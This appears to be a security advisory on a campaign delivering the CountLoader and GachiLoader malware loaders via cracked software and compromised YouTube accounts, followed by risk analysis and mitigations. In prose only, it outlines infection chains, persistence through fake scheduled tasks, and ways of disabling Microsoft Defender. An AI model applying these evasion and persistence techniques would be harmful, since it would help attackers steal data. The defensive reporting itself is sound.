The disclosed campaign utilizes cracked software distribution sites and compromised YouTube accounts to propagate two sophisticated malware loaders: CountLoader and GachiLoader. CountLoader, active since mid-2025, is a modular loader designed for stealth and persistence. Infection begins when users download cracked versions of legitimate software, such as Microsoft Word, which redirect them to malicious MediaFire-hosted ZIP archives. These archives contain an encrypted ZIP and a Word document with the password, leading to execution of a renamed Python interpreter configured to download CountLoader via mshta.exe. CountLoader establishes persistence by creating scheduled tasks mimicking legitimate Google tasks, running every 30 minutes for up to 10 years. It detects security tools like CrowdStrike Falcon and adapts its execution accordingly. Its capabilities include downloading and executing executables, DLLs, MSI installers, and Python modules; removing its own scheduled tasks; collecting extensive system information; spreading via USB drives by creating malicious shortcuts; and executing payloads directly in memory using mshta.exe or PowerShell. The final payload observed is ACR Stealer, an information stealer targeting sensitive data. Meanwhile, GachiLoader is a heavily obfuscated Node.js-based loader distributed through the YouTube Ghost Network, a collection of compromised YouTube accounts uploading malicious videos. GachiLoader employs advanced anti-analysis techniques, including privilege escalation attempts and disabling Microsoft Defender components by killing SecHealthUI.exe and setting exclusions. It uses a novel PE injection technique via Vectored Exception Handling to load malicious payloads stealthily. GachiLoader can deploy additional malware such as the Rhadamanthys stealer. Both loaders demonstrate advanced evasion tactics, including fileless execution, signed binary abuse, and multi-stage infection chains, complicating detection and remediation efforts. The campaign highlights evolving malware sophistication and the exploitation of popular platforms and software piracy to reach victims.

European organizations face significant risks from this campaign due to the widespread use of targeted legitimate software (e.g., Microsoft Word) and the popularity of YouTube as an information source. The malware’s ability to steal sensitive data through information stealers like ACR Stealer and Rhadamanthys threatens confidentiality and privacy, potentially leading to data breaches, intellectual property theft, and regulatory non-compliance under GDPR. The persistence mechanisms and stealthy execution increase the likelihood of prolonged undetected infections, enabling attackers to maintain access and conduct further malicious activities such as lateral movement or ransomware deployment. The USB propagation capability raises concerns for organizations with removable media usage policies, increasing infection vectors. Disabling or circumventing endpoint security tools like Microsoft Defender and CrowdStrike Falcon reduces detection efficacy, complicating incident response. The use of legitimate tools (mshta.exe, PowerShell, rundll32.exe) for execution and the abuse of signed binaries further hinder traditional signature-based defenses. This campaign could disrupt business operations, damage reputation, and incur financial losses. The multi-stage, modular nature of the malware allows attackers to tailor payloads to specific targets, increasing the threat’s adaptability and impact.

1. Implement strict application whitelisting to prevent execution of unauthorized or renamed binaries, especially those masquerading as legitimate tools like Python interpreters. 2. Monitor and audit scheduled tasks for suspicious entries, particularly those mimicking legitimate services with unusual names or long durations. 3. Restrict or disable execution of mshta.exe, PowerShell, and rundll32.exe scripts from untrusted sources or user contexts where not required. 4. Enforce strict controls and scanning on removable media to detect and block malicious shortcuts (LNK files) and payloads. 5. Deploy advanced endpoint detection and response (EDR) solutions capable of detecting fileless execution, signed binary abuse, and anomalous behavior patterns. 6. Conduct user awareness training emphasizing the risks of downloading cracked software and interacting with untrusted links or YouTube content. 7. Regularly update and patch all software, including security tools, to mitigate exploitation of known vulnerabilities. 8. Utilize network monitoring to detect unusual outbound connections to command-and-control servers, especially those initiated by mshta.exe or PowerShell. 9. Implement multi-factor authentication and least privilege principles to limit malware’s ability to escalate privileges or persist. 10. Collaborate with threat intelligence providers to stay informed about emerging indicators of compromise related to CountLoader and GachiLoader.